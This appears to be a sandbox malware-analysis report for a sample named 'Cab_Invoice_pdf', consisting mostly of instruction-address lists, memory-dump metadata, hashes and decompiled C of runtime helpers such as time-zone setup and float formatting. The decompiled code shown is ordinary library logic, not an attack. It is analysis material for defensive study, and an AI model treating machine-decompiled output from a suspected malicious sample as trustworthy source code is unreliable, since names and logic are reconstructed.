                            0x01329d3f
                            0x01329d41
                            0x01329d41
                            0x01329d41
                            0x01329d48
                            0x01329d48
                            0x01329d4a
                            0x01329d56
                            0x01329d56
                            0x01329d56
                            0x01329d4c
                            0x01329d4e
                            0x01329d4e
                            0x01329d5d
                            0x01329d60
                            0x01329d62
                            0x01329d69
                            0x01329d69
                            0x01329d64
                            0x01329d64
                            0x01329d64
                            0x01329d71
                            0x01329d7c
                            0x01329d82
                            0x01329d83
                            0x01329d88
                            0x01329d8e
                            0x01329d91
                            0x00000000
                            0x00000000
                            0x01329d93
                            0x01329d93
                            0x01329d9d
                            0x01329da8
                            0x01329db0
                            0x01329db6
                            0x01329dc1
                            0x01329dc7
                            0x01329dce
                            0x01329de1
                            0x01329de8
                            0x01329de8
                            0x00000000
                            0x01329d15
                            0x01329cfb
                            0x00000000
                            0x01329cf3
                            0x01329f30
                            0x01329f30
                            0x01329f36
                            0x01329f3b
                            0x01329f41
                            0x01329f54
                            0x01329f59
                            0x013298de
                            0x013298de
                            0x013298e7
                            0x013298e8
                            0x013298f2
                            0x013298f8
                            0x013298fa
                            0x01329b00
                            0x01329b08
                            0x01329b0b
                            0x01329b10
                            0x01329b13
                            0x01329b1b
                            0x01329b1f
                            0x01329b25
                            0x01329b2b
                            0x01329b30
                            0x01329b37
                            0x01329b38
                            0x01329b38
                            0x01329b38
                            0x01329b3f
                            0x01329b42
                            0x01329b4a
                            0x01329b50
                            0x01329b55
                            0x01329b55
                            0x01329b52
                            0x01329b52
                            0x01329b52
                            0x01329b59
                            0x01329b5a
                            0x01329b5c
                            0x01329b5f
                            0x01329b65
                            0x01329b6b
                            0x01329b6e
                            0x01329b71
                            0x01329b77
                            0x01329b7a
                            0x01329b7d
                            0x01329b87
                            0x01329b87
                            0x01329b87
                            0x01329b7f
                            0x01329b7f
                            0x01329b81
                            0x00000000
                            0x01329b83
                            0x01329b83
                            0x01329b83
                            0x01329b81
                            0x01329b89
                            0x01329b8b
                            0x01329c7d
                            0x01329c7d
                            0x01329c7f
                            0x01329c85
                            0x01329c8b
                            0x01329ca0
                            0x01329ca5
                            0x01329b91
                            0x01329b91
                            0x01329b93
                            0x00000000
                            0x01329b99
                            0x01329b9b
                            0x01329b9c
                            0x01329b9e
                            0x01329ba0
                            0x01329ba2
                            0x01329ba2
                            0x01329ba8
                            0x01329baa
                            0x01329bb0
                            0x01329bb3
                            0x01329bc1
                            0x01329bc7
                            0x01329bc7
                            0x01329bc9
                            0x01329bcc
                            0x01329bd2
                            0x01329bd2
                            0x01329bd4
                            0x00000000
                            0x00000000
                            0x01329bd6
                            0x01329bd8
                            0x01329bde
                            0x01329bde
                            0x01329bda
                            0x01329bda
                            0x01329bda
                            0x01329be3
                            0x01329be5
                            0x01329bec
                            0x01329bec
                            0x01329be7
                            0x01329be7
                            0x01329be7
                            0x01329c12
                            0x01329c18
                            0x01329c1b
                            0x01329c21
                            0x01329c28
                            0x01329c29
                            0x01329c2a
                            0x01329c30
                            0x01329c33
                            0x01329c35
                            0x00000000
                            0x01329c35
                            0x00000000
                            0x01329c33
                            0x01329c3d
                            0x01329c43
                            0x01329c4b
                            0x01329c4b
                            0x01329c4c
                            0x01329c4e
                            0x01329c52
                            0x01329c5a
                            0x01329c5a
                            0x01329c5a
                            0x01329c5c
                            0x01329c63
                            0x01329c68
                            0x01329c75
                            0x01329c6a
                            0x01329c6d
                            0x01329c6d
                            0x01329c68
                            0x01329b93
                            0x01329ca8
                            0x01329cb2
                            0x01329cb8
                            0x01329cbe
                            0x01329cc4
                            0x01329900
                            0x01329900
                            0x01329900
                            0x01329902
                            0x01329909
                            0x01329910
                            0x00000000
                            0x00000000
                            0x01329916
                            0x01329919
                            0x0132991c
                            0x00000000
                            0x0132991e
                            0x01329926
                            0x0132992b
                            0x01329930
                            0x01329931
                            0x01329933
                            0x0132993b
                            0x0132993f
                            0x01329945
                            0x0132994b
                            0x01329950
                            0x01329957
                            0x01329957
                            0x01329958
                            0x0132995b
                            0x01329963
                            0x01329969
                            0x0132996e
                            0x0132996e
                            0x0132996b
                            0x0132996b
                            0x0132996b
                            0x01329972
                            0x01329973
                            0x01329975
                            0x01329978
                            0x0132997e
                            0x01329984
                            0x01329987
                            0x0132998a
                            0x01329990
                            0x01329993
                            0x01329996
                            0x013299a0
                            0x013299a0
                            0x013299a0
                            0x01329998
                            0x01329998
                            0x0132999a
                            0x00000000
                            0x0132999c
                            0x0132999c
                            0x0132999c
                            0x0132999a
                            0x013299a2
                            0x013299a4
                            0x01329a99
                            0x01329a99
                            0x01329a9b
                            0x01329aa1
                            0x01329aa7
                            0x01329abc
                            0x01329ac1
                            0x013299aa
                            0x013299aa
                            0x013299ac
                            0x00000000
                            0x013299b2
                            0x013299b4
                            0x013299b5
                            0x013299b7
                            0x013299b9
                            0x013299bb
                            0x013299bb
                            0x013299c1
                            0x013299c3
                            0x013299c9
                            0x013299cc
                            0x013299da
                            0x013299e0
                            0x013299e0
                            0x013299e2
                            0x013299e5
                            0x013299eb
                            0x013299eb
                            0x013299ed
                            0x00000000
                            0x00000000
                            0x013299ef
                            0x013299f1
                            0x013299f7
                            0x013299f7
                            0x013299f3
                            0x013299f3
                            0x013299f3
                            0x013299fc
                            0x013299fe
                            0x01329a0b
                            0x01329a0b
                            0x01329a00
                            0x01329a06
                            0x01329a06
                            0x01329a29
                            0x01329a31
                            0x01329a38
                            0x01329a3f
                            0x01329a40
                            0x01329a43
                            0x01329a49
                            0x01329a4f
                            0x01329a52
                            0x01329a54
                            0x00000000
                            0x01329a54
                            0x00000000
                            0x01329a52
                            0x01329a5c
                            0x01329a62
                            0x01329a62
                            0x01329a68
                            0x01329a6a
                            0x01329a74
                            0x01329a76
                            0x01329a76
                            0x01329a76
                            0x01329a78
                            0x01329a7f
                            0x01329a84
                            0x01329a91
                            0x01329a86
                            0x01329a89
                            0x01329a89
                            0x01329a84
                            0x013299ac
                            0x01329ac4
                            0x01329acf
                            0x01329ad0
                            0x01329ad1
                            0x01329ad7
                            0x01329add
                            0x01329ae3
                            0x01329ae3
                            0x00000000
                            0x0132991c
                            0x00000000
                            0x01329902
                            0x01329ae4
                            0x01329aea
                            0x01329af1
                            0x01329af2
                            0x01329af3
                            0x01329af8
                            0x01329af8
                            0x01329f5c
                            0x01329f66
                            0x01329f67
                            0x01329f6d
                            0x01329f6f
                            0x0132a3d8
                            0x0132a3da
                            0x0132a3dc
                            0x0132a3e2
                            0x0132a3e4
                            0x0132a3ea
                            0x0132a3ec
                            0x0132a73e
                            0x0132a73e
                            0x0132a740
                            0x0132a746
                            0x0132a74d
                            0x0132a753
                            0x0132a755
                            0x0132a7f3
                            0x0132a7f3
                            0x0132a7f5
                            0x0132a7f6
                            0x0132a7fc
                            0x00000000
                            0x0132a75b
                            0x0132a75b
                            0x0132a75e
                            0x0132a764
                            0x0132a76a
                            0x0132a76c
                            0x0132a772
                            0x0132a774
                            0x0132a774
                            0x0132a776
                            0x0132a776
                            0x0132a77f
                            0x0132a786
                            0x0132a78c
                            0x0132a78f
                            0x0132a790
                            0x0132a792
                            0x0132a792
                            0x0132a796
                            0x0132a798
                            0x0132a79a
                            0x0132a7a0
                            0x0132a7a3
                            0x00000000
                            0x0132a7a5
                            0x0132a7a5
                            0x0132a7ac
                            0x0132a7ac
                            0x0132a7a3
                            0x0132a798
                            0x0132a76c
                            0x0132a75e
                            0x0132a755
                            0x0132a3f2
                            0x0132a3f2
                            0x0132a3f2
                            0x0132a3f5
                            0x0132a3f9
                            0x0132a3f9
                            0x0132a3fa
                            0x0132a40c
                            0x0132a419
                            0x0132a428
                            0x0132a452
                            0x0132a457
                            0x0132a45d
                            0x0132a460
                            0x0132a466
                            0x0132a469
                            0x0132a502
                            0x0132a509
                            0x0132a587
                            0x0132a58d
                            0x0132a593
                            0x0132a596
                            0x0132a598
                            0x0132a621
                            0x0132a59e
                            0x0132a59e
                            0x0132a5a4
                            0x0132a5a4
                            0x0132a5aa
                            0x0132a5b0
                            0x0132a5b2
                            0x0132a5b4
                            0x0132a5b4
                            0x0132a5ba
                            0x0132a5c0
                            0x0132a5c2
                            0x0132a5ca
                            0x0132a5ca
                            0x0132a5d0
                            0x0132a5d2
                            0x0132a5d4
                            0x0132a5da
                            0x0132a5dc
                            0x0132a6f3
                            0x0132a6f5
                            0x0132a6fb
                            0x0132a6fb
                            0x0132a6fe
                            0x0132a6ff
                            0x00000000
                            0x0132a5e2
                            0x0132a5e8
                            0x0132a5e8
                            0x0132a5ea
                            0x0132a5f0
                            0x0132a5f3
                            0x0132a5fa
                            0x0132a600
                            0x0132a602
                            0x0132a629
                            0x0132a62b
                            0x0132a62d
                            0x0132a62f
                            0x0132a635
                            0x0132a63b
                            0x0132a6d5
                            0x0132a6d5
                            0x0132a6d8
                            0x00000000
                            0x0132a6de
                            0x0132a6de
                            0x0132a6e4
                            0x00000000
                            0x0132a6e4
                            0x0132a641
                            0x0132a641
                            0x0132a641
                            0x0132a644
                            0x00000000
                            0x00000000
                            0x0132a646
                            0x0132a648
                            0x0132a64a
                            0x0132a653
                            0x0132a653
                            0x0132a655
                            0x0132a65b
                            0x0132a65b
                            0x0132a667
                            0x0132a672
                            0x0132a675
                            0x0132a682
                            0x0132a685
                            0x0132a686
                            0x0132a687
                            0x0132a68d
                            0x0132a68f
                            0x0132a695
                            0x0132a69b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132a69d
                            0x0132a69d
                            0x0132a69d
                            0x0132a69f
                            0x00000000
                            0x00000000
                            0x0132a6a1
                            0x0132a6a4
                            0x00000000
                            0x0132a6aa
                            0x0132a6aa
                            0x0132a6ac
                            0x0132a6ae
                            0x0132a6ae
                            0x0132a6ae
                            0x0132a6b6
                            0x0132a6b9
                            0x0132a6b9
                            0x0132a6bf
                            0x0132a6c1
                            0x0132a6c3
                            0x0132a6ca
                            0x0132a6d0
                            0x0132a6d2
                            0x00000000
                            0x0132a6d2
                            0x00000000
                            0x0132a6a4
                            0x00000000
                            0x0132a69d
                            0x00000000
                            0x0132a641
                            0x0132a604
                            0x0132a604
                            0x0132a606
                            0x0132a60c
                            0x0132a613
                            0x0132a613
                            0x0132a616
                            0x0132a616
                            0x00000000
                            0x0132a606
                            0x00000000
                            0x0132a6ea
                            0x0132a6ea
                            0x0132a6eb
                            0x0132a6eb
                            0x00000000
                            0x0132a5f0
                            0x0132a50b
                            0x0132a50b
                            0x0132a51d
                            0x0132a52c
                            0x0132a531
                            0x0132a534
                            0x0132a536
                            0x00000000
                            0x0132a53c
                            0x0132a53c
                            0x0132a53f
                            0x00000000
                            0x0132a545
                            0x0132a545
                            0x0132a54c
                            0x00000000
                            0x0132a552
                            0x0132a558
                            0x0132a55a
                            0x0132a560
                            0x0132a560
                            0x0132a562
                            0x0132a562
                            0x0132a564
                            0x0132a56d
                            0x0132a574
                            0x0132a577
                            0x0132a578
                            0x0132a57a
                            0x0132a57a
                            0x00000000
                            0x0132a582
                            0x0132a54c
                            0x0132a53f
                            0x0132a536
                            0x0132a46f
                            0x0132a46f
                            0x0132a475
                            0x0132a477
                            0x0132a493
                            0x0132a496
                            0x00000000
                            0x0132a49c
                            0x0132a49c
                            0x0132a4a3
                            0x00000000
                            0x0132a4a9
                            0x0132a4af
                            0x0132a4b1
                            0x0132a4b7
                            0x0132a4b7
                            0x0132a4b9
                            0x0132a4b9
                            0x0132a4bb
                            0x0132a4c4
                            0x0132a4cb
                            0x0132a4ce
                            0x0132a4cf
                            0x0132a4d1
                            0x0132a4d1
                            0x0132a4d9
                            0x0132a4d9
                            0x0132a4db
                            0x00000000
                            0x0132a4e1
                            0x0132a4e1
                            0x0132a4e7
                            0x0132a4ea
                            0x0132a7b4
                            0x0132a7b7
                            0x0132a7bd
                            0x0132a7d2
                            0x0132a7d7
                            0x0132a7da
                            0x0132a4f0
                            0x0132a4f0
                            0x0132a4f7
                            0x00000000
                            0x0132a4f7
                            0x0132a4ea
                            0x0132a4db
                            0x0132a4a3
                            0x0132a479
                            0x0132a479
                            0x0132a47b
                            0x0132a481
                            0x0132a487
                            0x0132a488
                            0x0132a705
                            0x0132a705
                            0x0132a70c
                            0x0132a70d
                            0x0132a70e
                            0x0132a713
                            0x0132a716
                            0x0132a716
                            0x0132a716
                            0x0132a477
                            0x0132a718
                            0x0132a718
                            0x0132a71a
                            0x0132a7e1
                            0x0132a7e8
                            0x0132a7ef
                            0x0132a802
                            0x0132a808
                            0x0132a809
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132a720
                            0x0132a726
                            0x0132a726
                            0x0132a72c
                            0x0132a72c
                            0x0132a738
                            0x00000000
                            0x0132a738
                            0x01329f75
                            0x01329f75
                            0x01329f77
                            0x01329f7d
                            0x01329f7f
                            0x01329f85
                            0x01329f87
                            0x0132a2fe
                            0x0132a2fe
                            0x0132a300
                            0x0132a306
                            0x0132a30d
                            0x0132a30f
                            0x0132a36e
                            0x0132a371
                            0x0132a377
                            0x0132a37d
                            0x0132a383
                            0x0132a385
                            0x0132a38b
                            0x0132a38d
                            0x0132a38d
                            0x0132a38f
                            0x0132a38f
                            0x0132a391
                            0x0132a39a
                            0x0132a3a1
                            0x0132a3a4
                            0x0132a3a5
                            0x0132a3a7
                            0x0132a3a7
                            0x0132a3af
                            0x0132a3b1
                            0x0132a3b7
                            0x0132a3bd
                            0x0132a3c0
                            0x00000000
                            0x0132a3c6
                            0x0132a3c6
                            0x0132a3cd
                            0x0132a3cd
                            0x0132a3c0
                            0x0132a3b1
                            0x0132a385
                            0x0132a311
                            0x0132a311
                            0x0132a313
                            0x0132a319
                            0x0132a31f
                            0x00000000
                            0x0132a31f
                            0x0132a30f
                            0x01329f8d
                            0x01329f8d
                            0x01329f8d
                            0x01329f90
                            0x01329f94
                            0x01329f94
                            0x01329f95
                            0x01329fa7
                            0x01329fb4
                            0x01329fc3
                            0x01329fed
                            0x01329ff2
                            0x01329ff8
                            0x01329ffb
                            0x0132a001
                            0x0132a004
                            0x0132a080
                            0x0132a087
                            0x0132a14b
                            0x0132a151
                            0x0132a157
                            0x0132a15a
                            0x0132a15c
                            0x0132a1e5
                            0x0132a162
                            0x0132a162
                            0x0132a168
                            0x0132a168
                            0x0132a16e
                            0x0132a174
                            0x0132a176
                            0x0132a178
                            0x0132a178
                            0x0132a17e
                            0x0132a184
                            0x0132a186
                            0x0132a18e
                            0x0132a18e
                            0x0132a194
                            0x0132a196
                            0x0132a198
                            0x0132a19e
                            0x0132a1a0
                            0x0132a2b7
                            0x0132a2b9
                            0x0132a2bf
                            0x0132a2bf
                            0x00000000
                            0x0132a1a6
                            0x0132a1ac
                            0x0132a1ac
                            0x0132a1ae
                            0x0132a1b4
                            0x0132a1b7
                            0x0132a1be
                            0x0132a1c4
                            0x0132a1c6
                            0x0132a1ed
                            0x0132a1ef
                            0x0132a1f1
                            0x0132a1f3
                            0x0132a1f9
                            0x0132a1ff
                            0x0132a299
                            0x0132a299
                            0x0132a29c
                            0x00000000
                            0x0132a2a2
                            0x0132a2a2
                            0x0132a2a8
                            0x00000000
                            0x0132a2a8
                            0x0132a205
                            0x0132a205
                            0x0132a205
                            0x0132a208
                            0x00000000
                            0x00000000
                            0x0132a20a
                            0x0132a20c
                            0x0132a20e
                            0x0132a217
                            0x0132a217
                            0x0132a219
                            0x0132a21f
                            0x0132a21f
                            0x0132a22b
                            0x0132a236
                            0x0132a239
                            0x0132a246
                            0x0132a249
                            0x0132a24a
                            0x0132a24b
                            0x0132a251
                            0x0132a253
                            0x0132a259
                            0x0132a25f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132a261
                            0x0132a261
                            0x0132a261
                            0x0132a263
                            0x00000000
                            0x00000000
                            0x0132a265
                            0x0132a268
                            0x0132a322
                            0x0132a322
                            0x0132a324
                            0x0132a32a
                            0x0132a330
                            0x0132a331
                            0x00000000
                            0x0132a26e
                            0x0132a26e
                            0x0132a270
                            0x0132a272
                            0x0132a272
                            0x0132a272
                            0x0132a27a
                            0x0132a27d
                            0x0132a27d
                            0x0132a283
                            0x0132a285
                            0x0132a287
                            0x0132a28e
                            0x0132a294
                            0x0132a296
                            0x00000000
                            0x0132a296
                            0x00000000
                            0x0132a268
                            0x00000000
                            0x0132a261
                            0x00000000
                            0x0132a205
                            0x0132a1c8
                            0x0132a1c8
                            0x0132a1ca
                            0x0132a1d0
                            0x0132a1d7
                            0x0132a1d7
                            0x0132a1da
                            0x0132a1da
                            0x00000000
                            0x0132a1ca
                            0x00000000
                            0x0132a2ae
                            0x0132a2ae
                            0x0132a2af
                            0x0132a2af
                            0x00000000
                            0x0132a1b4
                            0x0132a08d
                            0x0132a08d
                            0x0132a09f
                            0x0132a0ae
                            0x0132a0b3
                            0x0132a0b6
                            0x0132a0b8
                            0x0132a0d4
                            0x0132a0d7
                            0x00000000
                            0x0132a0dd
                            0x0132a0dd
                            0x0132a0e4
                            0x00000000
                            0x0132a0ea
                            0x0132a0f0
                            0x0132a0f2
                            0x0132a0f8
                            0x0132a0f8
                            0x0132a0fa
                            0x0132a0fa
                            0x0132a0fc
                            0x0132a105
                            0x0132a10c
                            0x0132a10f
                            0x0132a110
                            0x0132a112
                            0x0132a112
                            0x00000000
                            0x0132a0fa
                            0x0132a0e4
                            0x0132a0ba
                            0x0132a0bc
                            0x0132a0c2
                            0x0132a0c8
                            0x0132a0c9
                            0x00000000
                            0x0132a0c9
                            0x0132a0b8
                            0x0132a006
                            0x0132a006
                            0x0132a00c
                            0x0132a00e
                            0x0132a023
                            0x0132a026
                            0x00000000
                            0x0132a02c
                            0x0132a02c
                            0x0132a033
                            0x00000000
                            0x0132a039
                            0x0132a03f
                            0x0132a041
                            0x0132a047
                            0x0132a047
                            0x0132a049
                            0x0132a049
                            0x0132a04b
                            0x0132a054
                            0x0132a05b
                            0x0132a05e
                            0x0132a05f
                            0x0132a061
                            0x0132a061
                            0x0132a11a
                            0x0132a11a
                            0x0132a11c
                            0x00000000
                            0x0132a122
                            0x0132a122
                            0x0132a128
                            0x0132a12b
                            0x0132a06e
                            0x0132a075
                            0x00000000
                            0x0132a131
                            0x0132a133
                            0x0132a139
                            0x0132a13f
                            0x0132a140
                            0x0132a337
                            0x0132a337
                            0x0132a33e
                            0x0132a33f
                            0x0132a340
                            0x0132a345
                            0x0132a348
                            0x0132a348
                            0x0132a12b
                            0x0132a11c
                            0x0132a033
                            0x0132a010
                            0x0132a010
                            0x0132a012
                            0x0132a018
                            0x0132a2c2
                            0x0132a2c2
                            0x0132a2c3
                            0x0132a2c9
                            0x0132a2c9
                            0x0132a2d0
                            0x0132a2d1
                            0x0132a2d2
                            0x0132a2d7
                            0x0132a2da
                            0x0132a2da
                            0x0132a2da
                            0x0132a00e
                            0x0132a2dc
                            0x0132a2dc
                            0x0132a2de
                            0x0132a34c
                            0x0132a353
                            0x0132a353
                            0x0132a353
                            0x0132a35a
                            0x0132a35c
                            0x0132a362
                            0x0132a363
                            0x0132a80f
                            0x0132a80f
                            0x0132a810
                            0x0132a811
                            0x0132a816
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132a2e0
                            0x0132a2e6
                            0x0132a2e6
                            0x0132a2ec
                            0x0132a2ec
                            0x0132a2f8
                            0x00000000
                            0x0132a2f8
                            0x01329f87
                            0x0132a819
                            0x0132a819
                            0x0132a81f
                            0x0132a821
                            0x0132a827
                            0x0132a82d
                            0x0132a82f
                            0x0132a831
                            0x0132a833
                            0x0132a833
                            0x0132a835
                            0x0132a835
                            0x0132a83e
                            0x0132a83f
                            0x0132a843
                            0x0132a84a
                            0x0132a84d
                            0x0132a84e
                            0x0132a850
                            0x0132a850
                            0x0132a854
                            0x0132a85a
                            0x0132a85c
                            0x0132a862
                            0x0132a864
                            0x0132a86a
                            0x0132a86d
                            0x0132a880
                            0x0132a883
                            0x0132a889
                            0x0132a89e
                            0x0132a8a3
                            0x0132a86f
                            0x0132a871
                            0x0132a878
                            0x0132a878
                            0x0132a86d
                            0x0132a8a6
                            0x0132a8a6
                            0x0132a8b6
                            0x0132a8bf
                            0x0132a8c0
                            0x0132a8c2
                            0x0132a959
                            0x0132a95b
                            0x0132a966
                            0x0132a966
                            0x0132a968
                            0x0132a96b
                            0x0132a96d
                            0x00000000
                            0x0132a95d
                            0x0132a963
                            0x0132a963
                            0x0132a8c8
                            0x0132a8c8
                            0x0132a8ce
                            0x0132a8d1
                            0x0132a8d7
                            0x0132a8da
                            0x0132a8e0
                            0x0132a8e2
                            0x0132a8e8
                            0x0132a8ea
                            0x0132a8ec
                            0x0132a8ec
                            0x0132a8ee
                            0x0132a8ee
                            0x0132a8fb
                            0x0132a902
                            0x0132a905
                            0x0132a906
                            0x0132a908
                            0x0132a909
                            0x0132a909
                            0x0132a90d
                            0x0132a913
                            0x0132a915
                            0x0132a917
                            0x0132a91d
                            0x0132a920
                            0x0132a934
                            0x0132a93a
                            0x0132a94f
                            0x0132a954
                            0x0132a922
                            0x0132a922
                            0x0132a929
                            0x0132a929
                            0x0132a920
                            0x0132a915
                            0x0132a973
                            0x0132a973
                            0x0132a973
                            0x0132a97f
                            0x0132a982
                            0x0132a988
                            0x0132a98a
                            0x0132a98c
                            0x0132a992
                            0x0132a994
                            0x0132a994
                            0x0132a994
                            0x0132a992
                            0x0132a999
                            0x0132a99a
                            0x0132a99c
                            0x0132a99e
                            0x0132a99e
                            0x0132a9a0
                            0x0132a9a6
                            0x0132a9ac
                            0x0132a9ae
                            0x0132a9b4
                            0x0132a9b4
                            0x0132a9ba
                            0x0132a9bc
                            0x00000000
                            0x00000000
                            0x0132a9c2
                            0x0132a9c4
                            0x0132a9c6
                            0x0132a9c6
                            0x0132a9c8
                            0x0132a9c8
                            0x0132a9d8
                            0x0132a9df
                            0x0132a9e2
                            0x0132a9e3
                            0x0132a9e5
                            0x0132a9e5
                            0x0132a9e9
                            0x0132a9ef
                            0x0132a9f1
                            0x0132a9f3
                            0x0132a9f9
                            0x0132a9fc
                            0x0132aa0d
                            0x0132aa10
                            0x0132aa16
                            0x0132aa2b
                            0x0132aa30
                            0x0132a9fe
                            0x0132a9fe
                            0x0132aa05
                            0x0132aa05
                            0x0132a9fc
                            0x0132aa41
                            0x0132aa50
                            0x0132aa51
                            0x0132aa51
                            0x0132aa53
                            0x0132aa55
                            0x0132aa55
                            0x0132aa5b
                            0x0132aa5e
                            0x0132aa60
                            0x0132aa62
                            0x0132aa62
                            0x0132aa65
                            0x0132aa66
                            0x0132aa66
                            0x0132aa6b
                            0x0132aa6e
                            0x0132aa72
                            0x0132aa72
                            0x0132aa73
                            0x0132aa75
                            0x0132aa7b
                            0x0132aa81
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132aa81
                            0x0132a9b4
                            0x0132aa87
                            0x0132aa87
                            0x00000000
                            0x0132aa87
                            0x0132980c
                            0x01329803
                            0x013297fa
                            0x013297b1
                            0x013297b5
                            0x013297bd
                            0x00000000
                            0x013297bf
                            0x013297c5
                            0x013297ca
                            0x0132aaa6
                            0x0132aaa6
                            0x0132aaa9
                            0x0132aaaa
                            0x0132aab4
                            0x0132aadf
                            0x0132aae0
                            0x0132aae1
                            0x0132aae2
                            0x0132aae3
                            0x0132aae4
                            0x0132aae9
                            0x0132aaec
                            0x0132aaef
                            0x0132aaf7
                            0x0132aafb
                            0x0132ab07
                            0x0132ab0f
                            0x0132ab15
                            0x0132ab17
                            0x0132ab3f
                            0x0132ab41
                            0x0132ab45
                            0x0132ab7a
                            0x0132ab7b
                            0x0132ab80
                            0x0132ab81
                            0x0132ab82
                            0x0132ab83
                            0x0132ab8b
                            0x0132ab8d
                            0x0132ab9b
                            0x0132ab8f
                            0x0132ab8f
                            0x00000000
                            0x0132ab8f
                            0x0132ab47
                            0x0132ab47
                            0x0132ab4a
                            0x0132ab51
                            0x0132ab53
                            0x0132ab6b
                            0x0132ab55
                            0x0132ab55
                            0x00000000
                            0x0132ab55
                            0x00000000
                            0x0132ab53
                            0x0132ab19
                            0x0132ab19
                            0x0132ab1f
                            0x0132ab23
                            0x0132ab25
                            0x0132ab25
                            0x0132ab29
                            0x0132ab2c
                            0x0132ab2f
                            0x0132ab2f
                            0x0132ab32
                            0x0132ab35
                            0x0132ab59
                            0x0132ab59
                            0x0132ab6f
                            0x0132ab6f
                            0x0132ab72
                            0x0132ab93
                            0x0132ab93
                            0x0132ab96
                            0x0132ab96
                            0x0132ab9f
                            0x0132aba3
                            0x0132aba5
                            0x0132aba8
                            0x0132aba8
                            0x0132aba8
                            0x00000000
                            0x0132aba8
                            0x0132aba3
                            0x0132abb2
                            0x0132aab6
                            0x0132aab6
                            0x0132aab6
                            0x0132aac0
                            0x0132aac9
                            0x0132aace
                            0x0132aad4
                            0x0132aadc
                            0x0132aadc
                            0x0132aab4
                            0x013297bd

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __floor_pentium4
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                            • API String ID: 4168288129-2761157908
                            • Opcode ID: 430feac0b82200b05c329cd501f11170ec69275d4b741306eebb359193701bd0
                            • Instruction ID: 0b31a08c777df1005a9dabd6aa5c6c679d686dc831c2596e0640161e21db8c09
                            • Opcode Fuzzy Hash: 430feac0b82200b05c329cd501f11170ec69275d4b741306eebb359193701bd0
                            • Instruction Fuzzy Hash: B1C26B71E086398FDB25DE28DD407EAB7B9EB88318F1441EAD44DE7641E774AE818F40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132B193, Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E0132B193(void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				void* _t45;
				signed int _t49;
				void* _t53;
				void* _t55;
				signed int* _t60;
				intOrPtr _t70;
				void* _t79;
				signed int _t86;
				void* _t88;
				signed int _t89;
				signed int _t91;
				int _t95;
				void* _t97;
				char** _t98;
				signed int _t102;
				signed int _t104;
				signed int _t110;
				signed int _t111;
				intOrPtr _t120;
				intOrPtr _t122;

				_t98 = E0132ABFC();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E0132AC5A( &_v8);
				_t79 = _t97;
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01321798();
					asm("int3");
					_t110 = _t111;
					_t38 =  *0x133c008; // 0xa3433343
					_v56 = _t38 ^ _t110;
					 *0x133c91c =  *0x133c91c | 0xffffffff;
					 *0x133c910 =  *0x133c910 | 0xffffffff;
					_push(0);
					_push(_t98);
					_t76 = "TZ";
					_t91 = 0;
					 *0x1346578 = 0;
					_t42 = E01326CC0("TZ", _t88, 0, _t98, __eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t104 = E01320A25(_t79, _v272);
							__eflags = _t104;
							if(__eflags != 0) {
								_t49 = E01326CC0(_t76, _t88, 0, _t104, __eflags,  &_v276, _t104, _v272, _t76);
								__eflags = _t49;
								if(_t49 == 0) {
									E013209EB(0);
									_t91 = _t104;
								} else {
									_push(_t104);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E013209EB();
							}
						}
					} else {
						_t91 =  &_v268;
					}
					asm("sbb esi, esi");
					_t102 =  ~(_t91 -  &_v268) & _t91;
					__eflags = _t91;
					if(__eflags == 0) {
						L33:
						E0132B193(__eflags);
					} else {
						__eflags =  *_t91;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t91);
							E0132AFBE(__eflags);
						}
					}
					_t45 = E013209EB(_t102);
					__eflags = _v12 ^ _t110;
					E0131786A();
					return _t45;
				} else {
					_t53 = E0132AC02( &_v12);
					_pop(_t79);
					if(_t53 != 0) {
						goto L19;
					} else {
						_t55 = E0132AC2E( &_v16);
						_pop(_t79);
						if(_t55 != 0) {
							goto L19;
						} else {
							E013209EB( *0x1346574);
							 *0x1346574 = 0;
							 *_t111 = 0x1346580;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t86 =  *0x1346580 * 0x3c;
								_t89 =  *0x13465d4; // 0x0
								_push(_t90);
								 *0x1346578 = 1;
								_v8 = _t86;
								_t120 =  *0x13465c6; // 0x0
								if(_t120 != 0) {
									_v8 = _t86 + _t89 * 0x3c;
								}
								_t122 =  *0x134661a; // 0x0
								if(_t122 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t70 =  *0x1346628; // 0x0
									if(_t70 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t70 - _t89) * 0x3c;
									}
								}
								_t95 = E01327D59(0, _t89);
